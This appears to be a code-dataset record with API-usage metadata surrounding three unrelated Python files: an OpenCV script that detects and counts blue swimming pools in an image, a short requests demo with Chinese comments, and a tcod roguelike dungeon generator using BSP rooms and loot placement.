|
6
|
[
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "torch.nn.BatchNorm1d",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "torch.nn.ReLU",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "torch.nn.BatchNorm1d",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sigmoid",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "torch.nn.Module",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "torch.log",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "torch.log",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "torch.sqrt",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "torch.zeros_like",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "torch.sqrt",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 78,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "torch.zeros_like",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 97,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 97,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 100,
"usage_type": "name"
},
{
"api_name": "torch.zeros_like",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "torch.nn.modules.batchnorm._BatchNorm",
"line_number": 115,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.batch_norm",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 141,
"usage_type": "name"
},
{
"api_name": "torch.nn.Module",
"line_number": 152,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 152,
"usage_type": "name"
},
{
"api_name": "torch.nn.Module",
"line_number": 157,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 157,
"usage_type": "name"
},
{
"api_name": "torch.nn.ReLU",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 179,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sigmoid",
"line_number": 180,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 180,
"usage_type": "name"
},
{
"api_name": "torch.nn.Hardtanh",
"line_number": 181,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 181,
"usage_type": "name"
},
{
"api_name": "torch.nn.BCELoss",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 185,
"usage_type": "name"
},
{
"api_name": "torch.nn.Dropout",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 187,
"usage_type": "name"
},
{
"api_name": "torch.nn.Dropout",
"line_number": 188,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 188,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 196,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 198,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 198,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 199,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 212,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 212,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 213,
"usage_type": "name"
},
{
"api_name": "torch.nn.ModuleDict",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 229,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 245,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 252,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 252,
"usage_type": "name"
},
{
"api_name": "torch.nn.ModuleDict",
"line_number": 263,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 263,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 284,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 285,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 285,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.pad",
"line_number": 294,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 299,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 305,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 317,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 319,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 321,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 325,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 348,
"usage_type": "call"
},
{
"api_name": "torch.stack",
"line_number": 360,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 383,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 388,
"usage_type": "call"
},
{
"api_name": "torch.exp",
"line_number": 397,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line_number": 408,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 408,
"usage_type": "attribute"
},
{
"api_name": "torch.BoolTensor",
"line_number": 408,
"usage_type": "attribute"
}
] |
24455754580
|
# -*- coding: utf-8 -*-
"""
@author: Fatih Kemal Terzi
"""
import cv2
import numpy as np
# Image reading
img = cv2.imread('pools.png')
count=0
# Convert the image to HSV color space
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# Define the blue color range used to detect pools
lower_blue = np.array([80,50,50])
upper_blue = np.array([115,255,255])
# Create a binary mask that isolates the blue regions
mask = cv2.inRange(hsv, lower_blue, upper_blue)
# Perform morphological operations to reduce noise
kernel = np.ones((5,5),np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# Find contours of blue regions
contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Draw bounding boxes around the blue regions
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
count+=1
# Display the result
cv2.imshow('Detected_pools', img)
print('Number of pools : ',count)
cv2.waitKey(0)
cv2.destroyAllWindows()
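# Optional refinement (hypothetical): if tiny blue specks survive the morphological filtering,
# each one is counted as a pool. A common fix is to skip contours below a minimum area; the
# 100-pixel threshold here is an illustrative assumption, not part of the original script.
#
#   min_pool_area = 100
#   count = 0
#   for cnt in contours:
#       if cv2.contourArea(cnt) >= min_pool_area:
#           x, y, w, h = cv2.boundingRect(cnt)
#           cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
#           count += 1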
|
FatihKemalTerzi/Image-Processing
|
Midterm3.py
|
Midterm3.py
|
py
| 1,105 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cv2.imread",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2HSV",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "cv2.inRange",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "cv2.morphologyEx",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.MORPH_OPEN",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "cv2.morphologyEx",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "cv2.MORPH_CLOSE",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "cv2.findContours",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "cv2.RETR_TREE",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "cv2.CHAIN_APPROX_SIMPLE",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "cv2.boundingRect",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "cv2.rectangle",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 40,
"usage_type": "call"
}
] |
75131970108
|
import requests
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"}
"传入参数的形式"
params = {"wd":"haha"}
"最后面的问号可加可不加,不加的话,程序会自动帮你加上"
url_temp = "https://www.baidu.com/?"
"注意用requests调用post和get时的函数"
r = requests.get(url_temp, headers=headers, params=params)
print(r.status_code) # 获取请求得到的网页的状态
print(r.request.url) # 获取我们请求得到的网页网址
"下面这个更加简洁"
".format用起来和%s效果是一样的"
url_2 = "https://www.baidu.com/?wd={}".format("haha")
r = requests.get(url_2, headers=headers)
print(r.status_code) # 获取请求得到的网页的状态
print(r.request.url) # 获取我们请求得到的网页网址
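"For comparison (illustrative example): a POST request passes form data via the data argument"
post_data = {"key": "value"}  # hypothetical form data, not part of the original note
r = requests.post("https://httpbin.org/post", headers=headers, data=post_data)
print(r.status_code)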
|
hahahei957/NewProject_Opencv2
|
venv_2/爬虫/01_HelloWorld.py
|
01_HelloWorld.py
|
py
| 874 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 22,
"usage_type": "call"
}
] |
41202734206
|
import tcod
import random
import copy
import constants as const
import entity
import render
import numpy as np
import random_loot as rloot
class Room:
"""
A room! Wow.
"""
def __init__(self, x, y, w, h):
self.x = x # upper left point
self.y = y # upper left point
self.w = w
self.h = h
self.n_loot = 0
self.neighbors = []
class GameMap:
def __init__(self, width, height, con, show_map=False):
self.sample = None
self.width = width
self.con = con
self.height = height
self.tcod_empty_map = tcod.map.Map(self.width, self.height)
self.show_map = show_map
for x in range(self.width):
for y in range(self.height):
self.tcod_empty_map.transparent[y,x] = True
self.tcod_empty_map.walkable[y,x] = True
def get_sample(self):
"""
Used to color the walls and the floor
"""
ogrid = [np.arange(self.width, dtype=np.float32), np.arange(self.height, dtype=np.float32)]
noise = tcod.noise.Noise(
dimensions=2,
algorithm=tcod.NOISE_PERLIN,
implementation=tcod.noise.TURBULENCE,
hurst=0.9,
lacunarity=1.6,
octaves=5)
min_lum = 0.5
max_lum = 1
self.sample = noise.sample_ogrid(ogrid)*(max_lum-min_lum) + min_lum
def add_loot(self, turns, player, entities):
"""
Add loot to a new level
"""
n_slot = {}
for fslot in const.FeatureSlot:
# 2d4 features of each slot
n_slot[fslot] = sum([random.randint(1,4) for i in range(2)])
for wslot in const.WeaponSlot:
# 1d4 weapons of each slot
n_slot[wslot] = sum([random.randint(1,4) for i in range(1)])
for slot in n_slot:
n_generated = n_slot.get(slot)
for n in range(n_generated):
n_try = 50
while n_try > 0:
n_try -= 1
                    # loot is more probable in rooms with low arity
arity = random.choice([1,1,1,2,2,3,4,5])
rlist = [r for r in self.rooms_with_arity(arity) if r.n_loot < const.max_item_per_room]
if rlist:
room = random.choice(rlist)
(x,y) = self.random_cell_in_room(room)
if not self.tiles[x][y].item:
room.n_loot += 1
self.tiles[x][y].put_item(rloot.get_random_loot(slot, turns, player), entities)
break
def rooms_with_arity(self, max_arity):
"""
        Return the list of rooms with at most max_arity neighbors
"""
return [r for r in self.room_list if len(r.neighbors) <= max_arity]
def make_boss_map(self, turns, entities, player):
"""
An arena
"""
self.get_sample()
self.tiles = [[entity.Tile(x,y,color_coeff=self.sample[x][y]) for y in range(self.height)] for x in range(self.width)]
self.tcod_map = tcod.map.Map(self.width, self.height)
center_x = self.width / 2
center_y = self.height / 2
a = 30
b = 15
self.room_list = [Room(int(center_x - a), int(center_y - b), 2*a, 2*b)]
for x in range(self.width):
for y in range(self.height):
if ((x - center_x)/a)**2 + ((y - center_y)/b)**2 <= 1: # ellipse equation
self.set_unblocked(x, y)
(player.x, player.y) = (int(center_x / 2), int(center_y))
boss = entity.Boss(int(center_x * 1.5), int(center_y))
entities.append(boss)
turns.add_turn(boss.speed_mov, const.TurnType.ENEMY, boss)
self.recompute_fov(player.x, player.y)
return boss
def make_map_bsp(self, turns, entities, player):
self.get_sample()
self.tiles = [[entity.Tile(x,y,color_coeff=self.sample[x][y]) for y in range(self.height)] for x in range(self.width)]
self.room_list = None
self.tcod_map = tcod.map.Map(self.width, self.height)
map_width = self.width
map_height = self.height
if self.show_map:
for x in range(map_width):
for y in range(map_height):
self.tiles[x][y].is_seen = True
        # we guarantee a wall on the north and the west
        # this is necessary due to the way the rooms are generated
bsp = tcod.bsp.BSP(1,1,map_width-1, map_height-1)
bsp.split_recursive(6,6,6,1,1)
self.room_list = self.recursive_make_rooms(bsp)
# After the BSP generation, the dungeon is a tree
# Create some loops
rlist = self.rooms_with_arity(2)
for i in range(6):
for j in range(10):
c = random.choice(range(len(rlist)))
best = self.closest_rooms([rlist[c]], self.room_list)
if best:
astar = tcod.path.AStar(self.tcod_map)
score_tuple = None
best_tuple = []
for tuple_param in best:
(x1, y1, x2, y2, _, _) = tuple_param
path = astar.get_path(x1, y1, x2, y2)
tmp_score = int(len(path)/3)
if not score_tuple or tmp_score > score_tuple:
score_tuple = tmp_score
best_tuple = [tuple_param]
elif tmp_score == score_tuple:
best_tuple.append(tuple_param)
self.connect_rooms(random.choice(best_tuple))
del rlist[c]
break
# Initialization
(player.x, player.y) = self.random_cell()
(x, y) = self.random_cell()
self.place_stairs(x,y)
(x, y) = self.random_cell()
self.place_boss_stairs(x,y)
# self.place_boss_stairs(player.x,player.y) # DEBUG
self.add_loot(turns, player, entities)
self.recompute_fov(player.x, player.y)
def recompute_fov(self, x, y, light_walls=True, radius=0):
self.tcod_map.compute_fov(x, y, algorithm=2, radius=radius, light_walls=light_walls)
def is_visible(self, x, y):
return self.tcod_map.fov[y,x]
def spawn_boss(self, entities, fslot, level, player):
for i in range(50):
(x,y) = self.random_cell()
if not any([entity for entity in entities if entity.x == x and entity.y == y]):
if (fslot == const.FeatureSlot.i and level >= 3) or (fslot != const.FeatureSlot.i and level >= 2):
class_name = fslot.value.get("bug_class")
the_class = getattr(entity, class_name)
monster = the_class(x, y, level, player.fequiped.get(fslot), fslot)
else:
monster = entity.Monster(x, y, level, None, fslot)
entities.append(monster)
return monster
return None
def spawn(self, entities, feature):
# We try at most 50 times to spawn it
for i in range(50):
(x,y) = self.random_cell()
if not self.is_visible(x,y) and not any([entity for entity in entities if entity.x == x and entity.y == y]):
level = random.randint(1, 3)
if feature.n_bugs[level - 1] < const.n_bugs_max[feature.level - 1][level - 1]:
                    # mapgen bugs are OP. Give their ability to level 3 bugs only
if (feature.fslot == const.FeatureSlot.i and level >= 3) or (feature.fslot != const.FeatureSlot.i and level >= 2):
class_name = feature.fslot.value.get("bug_class")
the_class = getattr(entity, class_name)
monster = the_class(x, y, level, feature)
else:
monster = entity.Monster(x, y, level, feature)
entities.append(monster)
return monster
return None
def iterator_perimeter_room(self, r):
for x in range(r.x, r.x + r.w):
yield (x, r.y)
yield (x, r.y + r.h - 1)
# y has a shorter range because the corners are already yielded
for y in range(r.y + 1, r.y + r.h - 1):
yield (r.x, y)
yield (r.x + r.w - 1, y)
def closest_rooms(self, l1, l2):
best = []
score_best = None
for r1 in l1:
for r2 in l2:
if r1 != r2 and r1 not in r2.neighbors:
for (x1, y1) in self.iterator_perimeter_room(r1):
for (x2, y2) in self.iterator_perimeter_room(r2):
dx = abs(x1-x2)
dy = abs(y1-y2)
# This is not a hack. It is… hand-crafted mapgen
# if dx >= 4 and dy >= 4:
# score = max(abs(x1-x2),abs(y1-y2)) # Chebyshev distance
# else:
score = abs(x1-x2) + abs(y1-y2) # Manhattan distance
if score_best == None or score < score_best:
score_best = score
best = [(x1,y1,x2,y2,r1,r2)]
elif score == score_best:
best.append((x1,y1,x2,y2,r1,r2))
return best
def random_cell(self):
return self.random_cell_in_room(random.choice(self.room_list))
def random_cell_in_room(self, r):
while True:
x = random.randrange(r.x, r.x + r.w)
y = random.randrange(r.y, r.y + r.h)
if self.is_floor(x,y):
return (x,y)
def recursive_make_rooms(self, bsp):
if not bsp.children:
w = random.randrange(max(3,int(bsp.w/3)),bsp.w-2)
h = random.randrange(max(3,int(bsp.h/3)),bsp.h-2)
upper_left_x = random.randrange(bsp.x, bsp.x + bsp.w - w)
upper_left_y = random.randrange(bsp.y, bsp.y + bsp.h - h)
for x in range(0,w):
for y in range(0,h):
self.set_unblocked(upper_left_x + x, upper_left_y + y)
# Sometimes, add a central pillar
if (w % 2) == 1 and (h % 2) == 1:
if random.randrange(0,10) == 0:
center_x = upper_left_x + int((w-1)/2)
center_y = upper_left_y + int((h-1)/2)
self.set_blocked(center_x, center_y)
# And rarely a big one (rare because big rooms aren't common)
if (w % 2) == 0 and (h % 2) == 0 and w >= 10 and h >= 10 and random.randrange(0,2) == 0:
center_x = upper_left_x + int(w/2) - 1
center_y = upper_left_y + int(h/2) - 1
for x in range(0,2):
for y in range(0,2):
self.set_blocked(center_x + x, center_y + y)
return [Room(upper_left_x, upper_left_y, w, h)]
else:
l1 = self.recursive_make_rooms(bsp.children[0])
l2 = self.recursive_make_rooms(bsp.children[1])
            # it is guaranteed to connect
self.connect_rooms(random.choice(self.closest_rooms(l1,l2)))
return l1+l2
def connect_rooms(self, tuple_param, force=False):
(x1, y1, x2, y2, r1, r2) = tuple_param
r1.neighbors.append(r2)
r2.neighbors.append(r1)
door_chance = 4
if x1 == x2:
if y1 > y2:
y1 -= 1
y2 += 1
else:
y1 += 1
y2 -= 1
self.create_v_tunnel(y1, y2, x1)
if random.randint(0,door_chance) == 0:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0:
self.place_door(x2, y2)
elif y1 == y2:
if x1 > x2:
x1 -= 1
x2 += 1
else:
x1 += 1
x2 -= 1
self.create_h_tunnel(x1, x2, y1)
if random.randint(0,door_chance) == 0:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0:
self.place_door(x2, y2)
# elif abs(x1-x2) < 3 or abs(y1-y2) < 3:
else:
if random.randint(0, 1) == 1:
if x1 > x2:
x1 -= 1
else:
x1 += 1
if y1 > y2:
y2 += 1
y3 = y1 - 1
else:
y2 -= 1
y3 = y1 + 1
self.create_h_tunnel(x1, x2, y1)
self.create_v_tunnel(y3, y2, x2)
if random.randint(0,door_chance) == 0 and abs(x1-x2) > 1:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0 and abs(y1-y2) > 1:
self.place_door(x2, y2)
else:
if x1 > x2:
x2 += 1
x3 = x1 - 1
else:
x2 -= 1
x3 = x1 + 1
if y1 > y2:
y1 -= 1
else:
y1 += 1
self.create_v_tunnel(y1, y2, x1)
self.create_h_tunnel(x3, x2, y2)
if random.randint(0,door_chance) == 0 and abs(y1-y2) > 1:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0 and abs(x1-x2) > 1:
self.place_door(x2, y2)
def create_h_tunnel(self, x1, x2, y):
for x in range(min(x1, x2), max(x1, x2) + 1):
self.set_unblocked(x,y)
def create_v_tunnel(self, y1, y2, x):
for y in range(min(y1, y2), max(y1, y2) + 1):
self.set_unblocked(x,y)
def get_copy_map(self):
return copy.deepcopy(self.tcod_map)
def get_copy_empty_map(self):
return copy.deepcopy(self.tcod_empty_map)
def set_tile_type(self, x, y, ttype):
self.tiles[x][y] = entity.Tile(x, y, color_coeff=self.sample[x][y], ttype=ttype)
if self.show_map:
self.tiles[x][y].is_seen = True
self.tcod_map.transparent[y,x] = ttype.value.get("transparent")
self.tcod_map.walkable[y,x] = not ttype.value.get("collision")
def is_over_map(self, x, y):
return x >= 0 and y >= 0 and x < self.width and y < self.height
def set_blocked(self, x, y):
self.set_tile_type(x, y, const.TileType.WALL)
def set_unblocked(self, x, y):
self.set_tile_type(x, y, const.TileType.FLOOR)
def place_door(self, x, y):
self.set_tile_type(x, y, const.TileType.DOOR)
def place_stairs(self, x, y):
self.set_tile_type(x, y, const.TileType.STAIRS)
def place_boss_stairs(self, x, y):
self.set_tile_type(x, y, const.TileType.BOSS_STAIRS)
def is_floor(self, x, y):
return self.tiles[x][y].ftype == const.TileType.FLOOR
def is_door(self, x, y):
return self.tiles[x][y].ftype == const.TileType.DOOR
def is_stairs(self, x, y):
return self.tiles[x][y].ftype == const.TileType.STAIRS
def is_boss_stairs(self, x, y):
return self.tiles[x][y].ftype == const.TileType.BOSS_STAIRS
def is_blocked(self, x, y):
return not self.tcod_map.walkable[y,x]
def drop_item_on_floor(self, player, entities, item, drop_key):
if not self.tiles[player.x][player.y].item:
player.remove_from_inventory(item, drop_key)
return self.tiles[player.x][player.y].put_item(item, entities)
def is_weapon_on_floor_directly_equipable(self, player):
item = self.tiles[player.x][player.y].item
if item and isinstance(item, entity.Weapon) and not player.wequiped.get(item.wslot):
return True
return False
def get_item_on_floor(self, player, entities):
if self.tiles[player.x][player.y].item:
item = self.tiles[player.x][player.y].take_item(entities)
key = player.add_to_inventory(item)
return (item,key)
def description_item_on_floor(self, player):
"""
Get the name of the item on the floor where the player is
"""
if self.tiles[player.x][player.y].item:
return self.tiles[player.x][player.y].item.name
return None
def is_there_item_on_floor(self, player):
"""
Is there an item on the floor, where the player is?
"""
return self.tiles[player.x][player.y].item != None
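# A minimal, hypothetical usage sketch of GameMap, assuming `con` is a tcod console and that
# `turns`, `entities` and `player` provide the interfaces used above (turns.add_turn(...),
# a mutable entity list, and a player object with x/y attributes):
#
#   game_map = GameMap(width=80, height=50, con=con)
#   game_map.make_map_bsp(turns, entities, player)
#   if game_map.is_there_item_on_floor(player):
#       print(game_map.description_item_on_floor(player))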
|
cpiod/1rl
|
game_map.py
|
game_map.py
|
py
| 16,741 |
python
|
en
|
code
| 3 |
github-code
|
6
|
[
{
"api_name": "tcod.map.Map",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "tcod.map",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "tcod.noise.Noise",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "tcod.noise",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "tcod.NOISE_PERLIN",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "tcod.noise",
"line_number": 44,
"usage_type": "attribute"
},
{
"api_name": "constants.FeatureSlot",
"line_number": 57,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "constants.WeaponSlot",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "constants.max_item_per_room",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "random_loot.get_random_loot",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "entity.Tile",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "tcod.map.Map",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "tcod.map",
"line_number": 93,
"usage_type": "attribute"
},
{
"api_name": "entity.Boss",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "constants.TurnType",
"line_number": 106,
"usage_type": "attribute"
},
{
"api_name": "entity.Tile",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "tcod.map.Map",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "tcod.map",
"line_number": 114,
"usage_type": "attribute"
},
{
"api_name": "tcod.bsp.BSP",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "tcod.bsp",
"line_number": 123,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "tcod.path.AStar",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "tcod.path",
"line_number": 135,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "entity.x",
"line_number": 171,
"usage_type": "attribute"
},
{
"api_name": "entity.y",
"line_number": 171,
"usage_type": "attribute"
},
{
"api_name": "constants.FeatureSlot",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "entity.Monster",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "entity.x",
"line_number": 186,
"usage_type": "attribute"
},
{
"api_name": "entity.y",
"line_number": 186,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "constants.n_bugs_max",
"line_number": 188,
"usage_type": "attribute"
},
{
"api_name": "constants.FeatureSlot",
"line_number": 190,
"usage_type": "attribute"
},
{
"api_name": "entity.Monster",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 237,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 238,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 244,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 246,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 255,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 274,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 290,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 292,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 302,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 304,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 308,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 322,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 324,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 343,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
"line_number": 355,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
"line_number": 358,
"usage_type": "call"
},
{
"api_name": "entity.Tile",
"line_number": 361,
"usage_type": "call"
},
{
"api_name": "constants.TileType",
"line_number": 371,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 374,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 377,
